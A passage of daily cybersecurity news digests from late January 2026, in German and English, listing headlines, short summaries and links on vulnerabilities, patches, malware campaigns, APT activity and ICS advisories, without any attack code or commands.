Around January 11, 2026, archive.today (aka archive.is, archive.md, etc) started using its users as proxies to conduct a distributed denial of service (DDOS) attack against Gyrovague, my personal blog.

https://gyrovague.com/2026/02/01/archive-today-is-directing-a-ddos-attack-against-my-blog/

Exploiting MediaTeks Download Agent

In September 2025, Chimera quietly announced -world-first- support for MediaTek-s latest Dimensity 9400 and 8400 SoCs running DAs compiled months after MediaTek had patched Carbonara. So we figured they-d either found a way around the patches, or they were sitting on something entirely new. We had to find out.

https://blog.r0rt1z2.com/posts/exploiting-mediatek-datwo/

Hacking Moltbook: The AI Social Network Any Human Can Control

1 exposed database. 35,000 emails. 1.5M API keys. And 17,000 humans behind the not-so-autonomous AI network.

https://www.wiz.io/blog/exposed-moltbook-database-reveals-millions-of-api-keys

Inside Lodash-s Security Reset and Maintenance Reboot

For more than a decade, Lodash has been one of the most widely deployed libraries in the JavaScript ecosystem. Its utilities are deeply embedded in frameworks, build systems, and production applications across the web. Like many foundational dependencies, Lodash evolved into critical infrastructure long before the ecosystem had strong models for funding, governance, or long-term security operations.

https://socket.dev/blog/inside-lodash-security-reset?utm_medium=feed

Britain and Japan Join Forces on Cybersecurity and Strategic Minerals

Japan and Britain have agreed to expand cooperation on cybersecurity and critical mineral supply chains, framing the move as a strategic response to intensifying geopolitical, economic, and technological pressures. The British and Japanese cybersecurity strategy and agreement were confirmed during British Prime Minister Keir Starmer-s overnight visit to Tokyo, where leaders from both countries reaffirmed their commitment to collective security and economic resilience.

https://thecyberexpress.com/britain-japanese-cybersecurity-cooperation/

Russian APT28 Exploit Zero-Day Hours After Microsoft Discloses Office Vulnerability

Ukraines cyber defenders warn Russian hackers weaponized a Microsoft zero-day within 24 hours of public disclosure, targeting government agencies with malicious documents delivering Covenant framework backdoors.

https://thecyberexpress.com/russian-apt28-exploit-zero-day-cve-2026-21509/

Default Credentials, Vulnerable Devices Exploited in Polish Energy Grid Attack

A cyberattack by Russian state-sponsored threat actors that targeted at least 30 wind and solar farms in Poland relied on default credentials, lack of multi-factor authentication (MFA) and outdated and misconfigured devices, according to a new report on the December 2025 incident by CERT Polska, the Polish computer emergency response team.

https://thecyberexpress.com/default-credentials-polish-energy-grid-attack/

Vulnerabilities

OpenSSL: 12 Sicherheitslecks, eines erlaubt Schadcodeausführung und ist kritisch

In OpenSSL wurden 12 Sicherheitslücken entdeckt - mit KI-Tools. Eine davon gilt als kritisch. Aktualisierte Software steht bereit.

https://www.heise.de/news/OpenSSL-12-Sicherheitslecks-eines-erlaubt-Schadcodeausfuehrung-und-ist-kritisch-11161775.html

Sicherheitspatches: Root-Attacken auf IBM Db2 möglich

Mehrere Sicherheitslücken gefährden IBMs Datenbankmanagementsystem Db2. Primär können Instanzen abstürzen.

https://www.heise.de/news/Sicherheitspatches-Root-Attacken-auf-IBM-Db2-moeglich-11161723.html

Dell Unity: Angreifer können Schadcode mit Root-Rechten ausführen

Admins sollten zeitnah ein wichtiges Sicherheitsupdate für Dell Unity Operating Environment installieren.

https://www.heise.de/news/Dell-Unity-Angreifer-koennen-Schadcode-mit-Root-Rechten-ausfuehren-11162412.html

Security updates for Monday

Security updates have been issued by AlmaLinux (iperf3, kernel, and php), Debian (ceph, pillow, pyasn1, python-django, and python-tornado), Fedora (bind9-next, cef, chromium, fontforge, java-21-openjdk, java-25-openjdk, java-latest-openjdk, mingw-python-urllib3, mingw-python-wheel, nodejs20, nodejs22, nodejs24, opencc, openssl, python-wheel, and qownnotes), Red Hat (binutils, gcc-toolset-13-binutils, gcc-toolset-14-binutils, gcc-toolset-15-binutils, java-1.8.0-openjdk, and java-25-openjdk), Slackware (expat), SUSE (bind, cacti, cacti-spine, chromedriver, chromium, dirmngr, fontforge-20251009, glib2, golang-github-prometheus-prometheus, govulncheck-vulndb, icinga2, ImageMagick, kernel, logback, openCryptoki, openssl-1_1, python311-djangorestframework, python311-pypdf, python314, python315, qemu, and xen), and Ubuntu (linux, linux-aws, linux-aws-5.4, linux-gcp, linux-gcp-5.4, linux-hwe-5.4, linux-ibm, linux-ibm-5.4, linux-iot, linux-kvm and linux-aws-fips, linux-fips, linux-gcp-fips).

https://lwn.net/Articles/1056923/

Privileged File System Vulnerability Present in a SCADA System

We detail our discovery of CVE-2025-0921. This privileged file system flaw in SCADA system Iconics Suite could lead to a denial-of-service (DoS) attack.

https://unit42.paloaltonetworks.com/iconics-suite-cve-2025-0921/

Vulnerability & Patch Roundup - January 2026

Vulnerability reports and responsible disclosures are essential for website security awareness and education. Automated attacks targeting known software vulnerabilities are one of the leading causes of website compromises.To help educate website owners about potential threats to their environments, we-ve compiled a list of important security updates and vulnerability patches for the WordPress ecosystem this past month.

https://blog.sucuri.net/2026/01/vulnerability-patch-roundup-january-2026.html

Multiple vulnerabilities in Cybozu Garoon

https://jvn.jp/en/jp/JVN35265756/

Multiple Microsoft Office products vulnerable to untrusted search path

https://jvn.jp/en/jp/JVN04984838/

Sonatype Nexus Repository vulnerable to server-side request forgery

https://jvn.jp/en/jp/JVN64861120/

OS command injection in raspap-webgui

https://jvn.jp/en/jp/JVN27202136/

ZDI-26-050: GIMP ICO File Parsing Heap-based Buffer Overflow Remote Code Execution Vulnerability

http://www.zerodayinitiative.com/advisories/ZDI-26-050/

KI-Bot: OpenClaw (Moltbot) mit hochriskanter Codeschmuggel-Lücke

https://www.heise.de/news/KI-Bot-OpenClaw-Moltbot-mit-hochriskanter-Codeschmuggel-Luecke-11161705.html

Multiple vulnerabilities in Native Instruments Native Access (MacOS)

https://sec-consult.com/vulnerability-lab/advisory/multiple-vulnerabilities-in-native-instruments-native-access-macos/

CVE-2025-60021 (CVSS 9.8): command injection in Apache bRPC heap profiler

https://www.cyberark.com/resources/threat-research-blog/cve-2025-60021-cvss-9-8-command-injection-in-apache-brpc-heap-profiler

Tageszusammenfassung - 30.01.2026

2026-01-30T18:20:59Z

End-of-Day report

Timeframe: Donnerstag 29-01-2026 18:00 - Freitag 30-01-2026 18:00 Handler: Guenes Holler Co-Handler: Michael Schlagenhaufer

News

Someone Knows Bash Far Too Well, And We Love It (Ivanti EPMM Pre-Auth RCEs CVE-2026-1281 & CVE-2026-1340)

When Ivanti removed the embargoes from CVE-2026-1281 and CVE-2026-1340 - pre-auth Remote Command Execution vulnerabilities in Ivanti-s Endpoint Manager Mobile (EPMM) solution - we sighed with relief. Clearly, the universe had decided to continue mocking Secure-By-Design signers right on schedule - every January. [..] As we are always keen to remind everyone, today-s blog post didn-t ruin your weekend. Firstly, the APT currently exploiting these vulnerabilities, and secondly, your lack of response to the warnings from Ivanti and CISA did.

https://labs.watchtowr.com/someone-knows-bash-far-too-well-and-we-love-it-ivanti-epmm-pre-auth-rces-cve-2026-1281-cve-2026-1340/

Hugging Face abused to spread thousands of Android malware variants

A new Android malware campaign is using the Hugging Face platform as a repository for thousands of variations of an APK payload that collects credentials for popular financial and payment services.

https://www.bleepingcomputer.com/news/security/hugging-face-abused-to-spread-thousands-of-android-malware-variants/

Microsoft fixes Outlook bug blocking access to encrypted emails

Microsoft has fixed a known issue that prevented Microsoft 365 customers from opening encrypted emails in classic Outlook after a recent update.

https://www.bleepingcomputer.com/news/microsoft/microsoft-fixes-outlook-bug-blocking-access-to-encrypted-emails/

Undocumented "TelnetEnable" functionality of End of Service NETGEAR products

Some end of service NETGEAR products provide "TelnetEnable" functionality, which allows a magic packet to activate telnet service on the box. [..] Stop using the end of service products, including NETGEAR PR2000.

https://jvn.jp/en/jp/JVN46722282/

Researchers Find 175,000 Publicly Exposed Ollama AI Servers Across 130 Countries

Ollama is an open-source framework that allows users to easily download, run, and manage large language models (LLMs) locally on Windows, macOS, and Linux. While the service binds to the localhost address at 127.0.0[.]1:11434 by default, it's possible to expose it to the public internet by means of a trivial change: configuring it to bind to 0.0.0[.]0 or a public interface. The fact that Ollama, like the recently popular Moltbot (formerly Clawdbot), is hosted locally and operates outside of the enterprise security perimeter, poses new security concerns.

https://thehackernews.com/2026/01/researchers-find-175000-publicly.html

ShadowHS: A Fileless Linux Post-Exploitation Framework Built on a Weaponized hackshell

Cyble Research & Intelligence Labs (CRIL) has identified a Linux intrusion chain leveraging a highly obfuscated, fileless loader that deploys a weaponized variant of hackshell entirely from memory. Cyble tracks this activity under the name ShadowHS, reflecting its fileless execution model and lineage from the original hackshell utility.

https://cyble.com/blog/shadowhs-fileless-linux-post-exploitation-framework/

Cybersicherheitschef der USA lädt vertrauliche Dokumente bei ChatGPT hoch

Offenbar hatte sich ausgerechnet der Boss eine Ausnahmegenehmigung für die Nutzung des Tools geholt und agierte damit umgehend fahrlässig.

https://www.derstandard.at/story/3000000306469/cybersicherheitschef-der-usa-laedt-vertrauliche-dokumente-bei-chatgpt-hoch

Arsink Spyware Posing as WhatsApp, YouTube, Instagram, TikTok Hits 143 Countries

The interesting thing about this campaign is that hackers are not using the official Google Play Store to spread this, but posting links on Telegram and Discord or using the file-sharing site MediaFire. [..] They basically offer -Pro- or -Mod- versions of these apps, promising special features that the real apps don-t have. But, as soon as you download one, the app immediately asks for a long list of permissions.

https://hackread.com/arsink-spyware-whatsapp-youtube-instagram-tiktok/

Vulnerabilities

Security updates for Friday

Security updates have been issued by AlmaLinux (curl, gimp:2.8, glibc, grafana, grafana-pcp, kernel, osbuild-composer, php:8.3, python-urllib3, python3.11, and python3.12), Debian (chromium), Mageia (ceph, gpsd, libxml2, openjdk, openssl, and xen), SUSE (abseil-cpp, assertj-core, coredns, freerdp, java-11-openjdk, java-25-openjdk, libxml2, openssl-1_0_0, openssl-1_1, python, python-filelock, and python311-sse-starlette), and Ubuntu (kernel, linux, linux-aws, linux-aws-hwe, linux-hwe, linux-kvm, linux-oracle, linux, linux-aws, linux-kvm, linux-lts-xenial, linux-aws-fips, linux-fips, linux-fips, and texlive-bin).

https://lwn.net/Articles/1056692/

Kritische Schwachstellen in Ivanti Endpoint Manager Mobile - Updates empfohlen

Ivanti hat ein Security Advisory bezüglich kritischer Schwachstellen im Endpoint Manager Mobile veröffentlicht. Diese Sicherheitslücken werden bereits aktiv ausgenutzt. Die Schwachstellen ermöglichen einem*einer entfernten, nicht authentifizierten Angreifer:in, beliebigen Code auf dem betroffenen System auszuführen (Remote Code Execution), was die vollständige Kompromittierung des Servers erlaubt. CVE-2026-1281, CVE-2026-1340

https://www.cert.at/de/warnungen/2026/1/kritische-schwachstellen-in-ivanti-endpoint-manager-mobile-updates-empfohlen

BoidCMS v2.1.2 Apache .htaccess Rule Bypass Leading to Information Disclosure

https://cxsecurity.com/issue/WLB-2026010019

Lexmark Security Advisory

https://www.lexmark.com/content/dam/support/collateral/security-alerts/CVE-2025-65083.pdf

KiloView Encoder Series

https://www.cisa.gov/news-events/ics-advisories/icsa-26-029-01

Rockwell Automation ArmorStart LT

https://www.cisa.gov/news-events/ics-advisories/icsa-26-029-02

Rockwell Automation ControlLogix

https://www.cisa.gov/news-events/ics-advisories/icsa-26-029-03

Tageszusammenfassung - 29.01.2026

2026-01-29T18:29:40Z

End-of-Day report

Timeframe: Mittwoch 28-01-2026 18:00 - Donnerstag 29-01-2026 18:00 Handler: Alexander Riepl Co-Handler: Guenes Holler

News

Aisuru botnet sets new record with 31.4 Tbps DDoS attack

The Aisuru/Kimwolf botnet launched a new massive distributed denial of service (DDoS) attack that peaked at 31.4 Tbps and 200 million requests per second, setting a new record.

https://www.bleepingcomputer.com/news/security/aisuru-botnet-sets-new-record-with-314-tbps-ddos-attack/

Von wegen Virenschutz: Malware über Update-Server von Antivirus-Tool verteilt

Angreifer haben über das Antivirus-Tool eScan Malware auf Nutzersysteme geschleust. Ein Update-Server des Anbieters war kompromittiert.

https://www.golem.de/news/von-wegen-virenschutz-malware-ueber-update-server-von-antivirus-tool-verteilt-2601-204754.html

Theres a Rash of Scam Spam Coming From a Real Microsoft Address

There are reports that a legitimate Microsoft email address -- which Microsoft explicitly says customers should add to their allow list -- is delivering scam spam.

https://it.slashdot.org/story/26/01/28/1849206/theres-a-rash-of-scam-spam-coming-from-a-real-microsoft-address?utm_source=rss1.0mainlinkanon&utm_medium=feed

Ransomware crims forced to take off-RAMP as FBI seizes forum

Ransomware crims have just lost one of their best business platforms. US law enforcement has seized the notorious RAMP cybercrime forum's dark web and clearnet domains.

https://go.theregister.com/feed/www.theregister.com/2026/01/28/fbi_seizes_ramp_forum/

Patch or perish: Vulnerability exploits now dominate intrusions

Apply fixes within a few hours or face the music, say the pros.

https://go.theregister.com/feed/www.theregister.com/2026/01/29/faster_patching_please_cry_infoseccers/

ConsentFix (a.k.a. AuthCodeFix): Detecting OAuth2 Authorization Code Phishing

ConsentFix (a.k.a. AuthCodeFix) is the latest variant of the fix-type phishing attacks, initially identified by Push Security1. In this technique, the adversary tricks the victim into generating an OAuth authorization code that is part of a localhost URL by signing in to the Azure CLI instance (or other vulnerable applications). Then, the victim is instructed to copy that URL and paste it into a phishing website, essentially handing over the authorization code to the adversary, who is now able to exchange it for an access token. Using the access token, the adversary gets access to the victim-s Microsoft account.

https://blog.nviso.eu/2026/01/29/consentfix-a-k-a-authcodefix-detecting-oauth2-authorization-code-phishing/

Dissecting UAT-8099: New persistence mechanisms and regional focus

Cisco Talos observed new activity from UAT-8099 spanning from August 2025 through early 2026. Analysis of Cisco's file census and DNS traffic indicates that compromised IIS servers are located across India, Pakistan, Thailand, Vietnam, and Japan, with a distinct concentration of attacks in Thailand and Vietnam. Furthermore, this activity significantly overlaps with the WEBJACK campaign; we have identified high-confidence correlations across malware hashes, C2 infrastructure, victimology, and the promoted gambling sites.

https://blog.talosintelligence.com/uat-8099-new-persistence-mechanisms-and-regional-focus/

Malicious Google Ads Target Mac Users with Fake Mac Cleaner Pages

Researchers at MacKeeper have found malicious Google Ads for -Mac cleaner- tools that trick users into running dangerous Terminal commands. Stay safe by learning how to spot these fake Apple sites.

https://hackread.com/malicious-google-ads-mac-fake-mac-cleaner/

Unveiling the Weaponized Web Shell EncystPHP

FortiGuard Labs has discovered a web shell that we named -EncystPHP.- It features several advanced capabilities, including remote command execution, persistence mechanisms, and web shell deployment. Incidents were launched in early December last year and propagated via exploitation of the FreePBX vulnerability CVE-2025-64328.

https://feeds.fortinet.com/~/943094408/0/fortinet/blogs~Unveiling-the-Weaponized-Web-Shell-EncystPHP

Vulnerabilities

Nvidia Sicherheitslücken: Attacken auf GPU-Treiber können zu Abstürzen führen

Softwareschwachstellen gefährden PCs mit Grafikkarten von Nvidia. Sicherheitspatches sind verfügbar.

https://www.heise.de/news/Nvidia-Sicherheitsluecken-Attacken-auf-GPU-Treiber-koennen-zu-Abstuerzen-fuehren-11158836.html

Security updates for Thursday

Security updates have been issued by AlmaLinux (java-25-openjdk, openssl, and python3.9), Debian (gimp, libmatio, pyasn1, and python-django), Fedora (perl-HarfBuzz-Shaper, python-tinycss2, and weasyprint), Mageia (glib2.0), Oracle (curl, fence-agents, gcc-toolset-15-binutils, glibc, grafana, java-1.8.0-openjdk, kernel, mariadb, osbuild-composer, perl, php:8.2, python-urllib3, python3.11, python3.11-urllib3, python3.12, and python3.12-urllib3), SUSE (alloy, avahi, bind, buildah, busybox, container-suseconnect, coredns, gdk-pixbuf, gimp, go1.24, go1.24-openssl, go1.25, helm, kernel, kubernetes, libheif, libpcap, libpng16, openjpeg2, openssl-1_0_0, openssl-1_1, openssl-3, php8, python-jaraco.context, python-marshmallow, python-pyasn1, python-urllib3, python-virtualenv, python311, python313, rabbitmq-server, xen, zli, and zot-registry), and Ubuntu (containerd, containerd-app and wlc).

https://lwn.net/Articles/1056544/

ZDI-26-049: Delta Electronics DIAView Exposed Dangerous Method Remote Code Execution Vulnerability

http://www.zerodayinitiative.com/advisories/ZDI-26-049/

ZDI-26-048: Fortinet FortiSandbox fortisandbox Server-Side Request Forgery Remote Code Execution Vulnerability

http://www.zerodayinitiative.com/advisories/ZDI-26-048/

ZDI-26-047: Hancom Office DOC File Parsing Type Confusion Remote Code Execution Vulnerability

http://www.zerodayinitiative.com/advisories/ZDI-26-047/

ZDI-26-046: Cisco Snort _bnfa_search_csparse_nfa Use-After-Free Remote Code Execution Vulnerability

http://www.zerodayinitiative.com/advisories/ZDI-26-046/

Tageszusammenfassung - 28.01.2026

2026-01-28T19:17:19Z

End-of-Day report

Timeframe: Dienstag 27-01-2026 18:00 - Mittwoch 28-01-2026 18:30 Handler: Felician Fuchs Co-Handler: Alexander Riepl

News

Fortinet blocks exploited FortiCloud SSO zero day until patch is ready

Fortinet has confirmed a new, actively exploited critical FortiCloud single sign-on (SSO) authentication bypass vulnerability, tracked as CVE-2026-24858, and says it has mitigated the zero-day attacks by blocking FortiCloud SSO connections from devices running vulnerable firmware versions.

https://www.bleepingcomputer.com/news/security/fortinet-blocks-exploited-forticloud-sso-zero-day-until-patch-is-ready/

Slovakian man pleads guilty to operating darknet marketplace

A Slovakian national admitted on Tuesday to helping operate a darknet marketplace that sold narcotics, cybercrime tools and services, fake government IDs, and stolen personal information for more than two years.

https://www.bleepingcomputer.com/news/security/slovakian-man-pleads-guilty-to-operating-kingdown-market-cybercrime-marketplace/

Hackers hijack exposed LLM endpoints in Bizarre Bazaar operation

A malicious campaign is actively targeting exposed LLM (Large Language Model) service endpoints to commercialize unauthorized access to AI infrastructure.

https://www.bleepingcomputer.com/news/security/hackers-hijack-exposed-llm-endpoints-in-bizarre-bazaar-operation/

Vibe-Coded Sicarii Ransomware Cant Be Decrypted

A new ransomware strain that entered the scene last year has poorly designed code and an odd "Hebrew" identity that might be a false flag.

https://www.darkreading.com/endpoint-security/vibe-coded-sicarii-ransomware-decrypted

WhatsApp Rolls Out Lockdown-Style Security Mode to Protect Targeted Users From Spyware

Meta on Tuesday announced its adding Strict Account Settings on WhatsApp to secure certain users against advanced cyber attacks because of who they are and what they do.

https://thehackernews.com/2026/01/whatsapp-rolls-out-lockdown-style.html

Fake Python Spellchecker Packages on PyPI Delivered Hidden Remote Access Trojan

Cybersecurity researchers have discovered two malicious packages in the Python Package Index (PyPI) repository that masquerade as spellcheckers but contain functionality to deliver a remote access trojan (RAT).

https://thehackernews.com/2026/01/fake-python-spellchecker-packages-on.html

Mustang Panda Deploys Updated COOLCLIENT Backdoor in Government Cyber Attacks

Threat actors with ties to China have been observed using an updated version of a backdoor called COOLCLIENT in cyber espionage attacks in 2025 to facilitate comprehensive data theft from infected endpoints.

https://thehackernews.com/2026/01/mustang-panda-deploys-updated.html

Leder-Unikate von -maronellis.com-: Alles Schwindel!

Sobald Werbeanzeigen von einem kleinen Familienbetrieb berichten, der leider schließen muss, ist Vorsicht angebracht. Besonders dann, wenn eine angebliche Reportage Eindrücke vom großen Ansturm auf die letzten handgefertigten Einzelstücke liefert. Wie problematische Onlineshops funktionieren und wie die Kriminellen ihre Opfer anlocken - eine Analyse am Beispiel -maronellis.com-.

https://www.watchlist-internet.at/news/leder-unikate-maronelliscom/

Open Source statt Big Tech: Frankreich will Microsoft Teams, Zoom und Co loswerden

Visio entsteigt der Pilotphase und soll bis 2027 von 200.000 Beamten genutzt werden. Das Streben nach Souveränität, aber auch Kosteneinsparungen liefern die Motivation

https://www.derstandard.at/story/3000000306024/open-source-statt-big-tech-frankreich-will-microsoft-teams-zoom-und-co-loswerden

EU fordert Öffnung von Android für andere KI - innerhalb von sechs Monaten

Die exklusive, tiefgehende Integration von Gemini in das Betriebssystem sei ein Verstoß gegen den Digital Markets Act. Zudem will die EU, dass Google Suchdaten an Konkurrenten herausgibt

https://www.derstandard.at/story/3000000306105/eu-fordert-oeffnung-von-android-fuer-andere-ki-innerhalb-von-sechs-monaten

Angriffswelle auf Journalisten über Signal-Messenger

Auch andere zivilgesellschaftliche Akteure betroffen. Bösartige Phishing-Nachricht fordert wegen "verdächtiger Aktivitäten" zur "Verifizierung" auf.

https://www.derstandard.at/story/3000000306125/angriffswelle-auf-journalisten-ueber-signal-messenger

Beware! Fake ChatGPT browser extensions are stealing your login credentials

If youve installed a browser extension to enhance your ChatGPT experience, you might want to think again. Read more in my article on the Hot for Security blog.

https://www.bitdefender.com/en-us/blog/hotforsecurity/beware-fake-chatgpt-browser-extensions-are-stealing-your-login-credentials

Cyberattack on Poland-s power grid hit around 30 facilities, new report says

Adding to previous research about an operation against Polands electrical grid, analysts at Dragos say it affected dozens of facilities and disrupted operational technology.

https://therecord.media/poland-electrical-grid-cyberattack-30-facilities-affected

Exchange Online: Microsoft verschiebt SMTP AUTH Basic Authentication-Abschaltung

Eigentlich wollte Microsoft in Exchange Online die Unterstützung für die Basisauthentifizierung mit Client-Übermittlung (SMTP AUTH) bereits im September 2025 einstellen. Dann hieß es, dass die Einstellung zwischen 1. März 2026 bis zum 30. April 2026 schrittweise einstellen.

https://borncity.com/blog/2026/01/28/exchange-online-microsoft-verschiebt-smtp-auth-basic-authentication-abschaltung/

ShinyHunters Target 100+ Firms Using Phone Calls to Bypass SSO Security

ShinyHunters is driving attacks on 100+ organisations, using vishing and fake login pages with allied groups to bypass SSO and steal company data, reports Silent Push.

https://hackread.com/shinyhunters-target-firms-bypass-sso-security/

Russian Cybercrime Platform RAMP Forum Seized by Feds

US authorities have seized the RAMP cybercrime forum, taking down both its clearnet and dark web domains in a major hit to the ransomware infrastructure.

https://hackread.com/russian-cybercrime-ramp-forum-seized-feds/

OpenSSL January 2026 Security Update: CMS and PKCS#12 Buffer Overflows

A deep dive into OpenSSL-s January 2026 CMS and PKCS#12 vulnerabilities, including a pre-auth stack overflow and a PKCS#12 parsing bug.

https://securitylabs.datadoghq.com/articles/openssl-january-2026-security-update-cms-and-pkcs12-buffer-overflows/

Vulnerabilities

Administrative FortiCloud SSO authentication bypass

An Authentication Bypass Using an Alternate Path or Channel vulnerability [CWE-288] in FortiOS, FortiManager, FortiAnalyzer may allow an attacker with a FortiCloud account and a registered device to log into other devices registered to other accounts, if FortiCloud SSO authentication is enabled on those devices.

https://fortiguard.fortinet.com/psirt/FG-IR-26-060

SolarWinds warns of critical Web Help Desk RCE, auth bypass flaws

SolarWinds has released security updates to patch critical authentication bypass and remote command execution vulnerabilities in its Web Help Desk IT help desk software.

https://www.bleepingcomputer.com/news/security/solarwinds-warns-of-critical-web-help-desk-rce-auth-bypass-flaws/

Two High-Severity n8n Flaws Allow Authenticated Remote Code Execution

Cybersecurity researchers have disclosed two new security flaws in the n8n workflow automation platform, including a crucial vulnerability that could result in remote code execution.

https://thehackernews.com/2026/01/two-high-severity-n8n-flaws-allow.html

Critical vm2 Node.js Flaw Allows Sandbox Escape and Arbitrary Code Execution

A critical sandbox escape vulnerability has been disclosed in the popular vm2 Node.js library that, if successfully exploited, could allow attackers to run arbitrary code on the underlying operating system. The vulnerability, tracked as CVE-2026-22709, carries a CVSS score of 9.8 out of 10.0 on the CVSS scoring system.

https://thehackernews.com/2026/01/critical-vm2-nodejs-flaw-allows-sandbox.html

Netzwerkmanagementlösung HPE Aruba Fabric Composer ist angreifbar

Angreifer können Systeme mit HPE Aruba Networking Fabric Composer mit Schadcode attackieren.

https://www.heise.de/news/Netzwerkmanagementloesung-HPE-Aruba-Fabric-Composer-ist-angreifbar-11156836.html

A critical GnuPG security update

There is a new GnuPG update for a "critical security bug" in recentGnuPG releases. A crafted CMS (S/MIME) EnvelopedData message carrying an oversized wrapped session key can cause a stack buffer overflow in gpg-agent during the PKDECRYPT--kem=CMS handling. This can easily be used for a DoS but, worse, the memory corruption can very likley also be used to mount a remote code execution attack. The bug was introduced while changing an internal API to the FIPS required KEM API.

https://lwn.net/Articles/1056209/

Security updates for Wednesday

Security updates have been issued by AlmaLinux (java-1.8.0-openjdk), Debian (openssl), Fedora (assimp, chromium, curl, freerdp, gimp, and harfbuzz), Mageia (glibc, haproxy, iperf, and python-pyasn1), Red Hat (image-builder, openssl, and osbuild-composer), Slackware (mozilla), SUSE (avahi, cups, gio-branding-upstream, google-osconfig-agent, java-11-openjdk, java-17-openjdk, java-21-openjdk, kernel-firmware, libmatio-devel, libopenjp2-7, nodejs22, php8, python-python-multipart, python311-urllib3_1, qemu, and xen), and Ubuntu (ffmpeg, jaraco.context, openssl, and openssl, openssl1.0).

https://lwn.net/Articles/1056330/

Security Vulnerabilities fixed in Thunderbird 140.7.1

CSS-based exfiltration of the content from partially encrypted emails when allowing remote content.

https://www.mozilla.org/en-US/security/advisories/mfsa2026-08/

[R1] Tenable Network Monitor Version 6.5.3 Fixes Multiple Vulnerabilities

Nessus Network Monitor leverages third-party software to help provide underlying functionality. Several of the third-party components (libxml2, libxslt, expat, c-ares, curl, sqlite) were found to contain vulnerabilities, and updated versions have been made available by the providers.

https://www.tenable.com/security/tns-2026-02

Notification about the vulnerability in beat-access for Windows - Privilege Escalation Risk

A vulnerability has been identified in beat-access for Windows, a remote access software provided as part of the beat service, which may allow malicious code to be executed from the local environment. At the time of posting this notice, no attacks exploiting this vulnerability have been confirmed. However, we strongly recommend that customers using beat-access for Windows promptly update to the latest version (4.0.0 or later).

https://www.fujifilm.com/fbglobal/eng/company/news/notice/2026/0127_announce.html

CVE-2025-60021 (CVSS 9.8): Command injection in Apache bRPC heap profiler

CVE-2025-60021, a critical command injection issue in Apache bRPC-s /pprof/heap profiler endpoint, was identified during broader analysis of diagnostic and debugging surfaces in the framework.

https://www.cyberark.com/resources/threat-research-blog/cve-2025-60021-cvss-9-8-command-injection-in-apache-brpc-heap-profiler

Chrome: Stable Channel Update for Desktop

http://chromereleases.googleblog.com/2026/01/stable-channel-update-for-desktop_27.html

Johnson Controls Products

https://www.cisa.gov/news-events/ics-advisories/icsa-26-027-04

Festo Didactic SE MES PC

https://www.cisa.gov/news-events/ics-advisories/icsa-26-027-02

iba Systems ibaPDA

https://www.cisa.gov/news-events/ics-advisories/icsa-26-027-01

Schneider Electric Zigbee Products

https://www.cisa.gov/news-events/ics-advisories/icsa-26-027-03

Tageszusammenfassung - 27.01.2026

2026-01-27T18:19:10Z

End-of-Day report

Timeframe: Montag 26-01-2026 18:00 - Dienstag 27-01-2026 18:00 Handler: Guenes Holler Co-Handler: Alexander Riepl

News

Over 6,000 SmarterMail servers exposed to automated hijacking attacks

Nonprofit security organization Shadowserver has found over 6,000 SmarterMail servers exposed online and likely vulnerable to attacks exploiting a critical authentication bypass vulnerability.

https://www.bleepingcomputer.com/news/security/over-6-000-smartermail-servers-exposed-to-automated-hijacking-attacks/

Nike investigates data breach after extortion gang leaks files

Nike is investigating what it described as a "potential cyber security incident" after the World Leaks ransomware gang leaked 1.4 TB of files allegedly stolen from the sportswear giant.

https://www.bleepingcomputer.com/news/security/nike-investigates-data-breach-after-extortion-gang-leaks-files/

Microsoft bringt Notfallpatch: Office-Nutzer werden über Zero-Day-Lücke attackiert

Eine gefährliche Sicherheitslücke betrifft alle gängigen Office-Versionen. Angesichts der aktiven Ausnutzung sollten Anwender zügig patchen.

https://www.golem.de/news/microsoft-bringt-notfallpatch-office-nutzer-werden-ueber-zero-day-luecke-attackiert-2601-204646.html

Attacken beobachtet: Uralte Telnetd-Lücke gefährdet Hunderttausende Systeme

Seit über zehn Jahren können sich Angreifer via Telnet Root-Zugriff auf unzählige Geräte verschaffen. Neue Scans zeigen das Ausmaß.

https://www.golem.de/news/attacken-beobachtet-uralte-telnetd-luecke-gefaehrdet-hunderttausende-systeme-2601-204656.html

Bypassing Windows Administrator Protection

A headline feature introduced in the latest release of Windows 11, 25H2 is Administrator Protection. The goal of this feature is to replace User Account Control (UAC) with a more robust and importantly, securable system to allow a local user to access administrator privileges only when necessary.This blog post will give a brief overview of the new feature, how it works and how it-s different from UAC. I-ll then describe some of the security research I undertook while it was in the ..

https://projectzero.google/2026/26/windows-administrator-protection.html

HoneyMyte updates CoolClient and deploys multiple stealers in recent campaigns

Kaspersky researchers analyze updated CoolClient backdoor and new tools and scripts used in HoneyMyte (aka Mustang Panda or Bronze President) APT campaigns, including three variants of a browser data stealer.

https://securelist.com/honeymyte-updates-coolclient-uses-browser-stealers-and-scripts/118664/

Canva among ~100 targets of ShinyHunters Okta identity-theft campaign

Atlassian, RingCentral, ZoomInfo also among tech targets ShinyHunters has targeted around 100 organizations in its latest Okta single sign-on (SSO) credential stealing campaign, according to researchers and the criminal group itself.

https://www.theregister.com/2026/01/26/shinyhunters_okta_sso_campaign/

Threat actors use FortiCloud SSO bypass to collect LDAP connection passwords

CERT.at gained access to a toolkit of an unknown threat actor targeting FortiCloud SSO bypass in Fortinet appliances (CVE-2025-59718/CVE-2025-59719). We are releasing under TLP:CLEAR key findings about likely post-exploitation goals of the attacker. The obtained exploit works only for the original vulnerability [1] and is not effective against patched ..

https://www.cert.at/en/blog/2026/1/threat-actors-use-forticloud-to-collect-ldap-connection-passwords

Russian security systems firm Delta hit by cyberattack, services disrupted

Building and car alarm systems managed by Russian company Delta have been disrupted by a cyberattack blamed on a "hostile foreign state."

https://therecord.media/russia-delta-security-alarm-company-cyberattack

Clawdbot: Ein OpenSource KI-Assistent - cool und ein Sicherheitsdesaster

Bisher dominierten AI-Dienste wie ChatGPT, Gemini etc. den Bereich der LLMs - und Bots setzen auf diesen LLMs auf. Peter Steinberger hat mit seinem Team einen OpenSource Bot, Clawdbot, gebaut, der lokal läuft, Schnittstellen zu diversen Diensten und Modellen bietet ..

https://borncity.com/blog/2026/01/26/clawdbot-ein-opensource-ki-assistent/

Diverse Threat Actors Exploiting Critical WinRAR Vulnerability CVE-2025-8088

The Google Threat Intelligence Group (GTIG) has identified widespread, active exploitation of the critical vulnerability CVE-2025-8088 in WinRAR, a popular file archiver tool for Windows, to establish initial access and deliver diverse payloads. Discovered and patched in July 2025, government-backed threat actors linked to Russia and China as well as financially motivated threat actors continue to exploit this n-day across disparate operations. The consistent exploitation method, a ..

https://cloud.google.com/blog/topics/threat-intelligence/exploiting-critical-winrar-vulnerability/

Apache Hadoop: Fehler im HDFS-Native-Client lässt Schadcode passieren

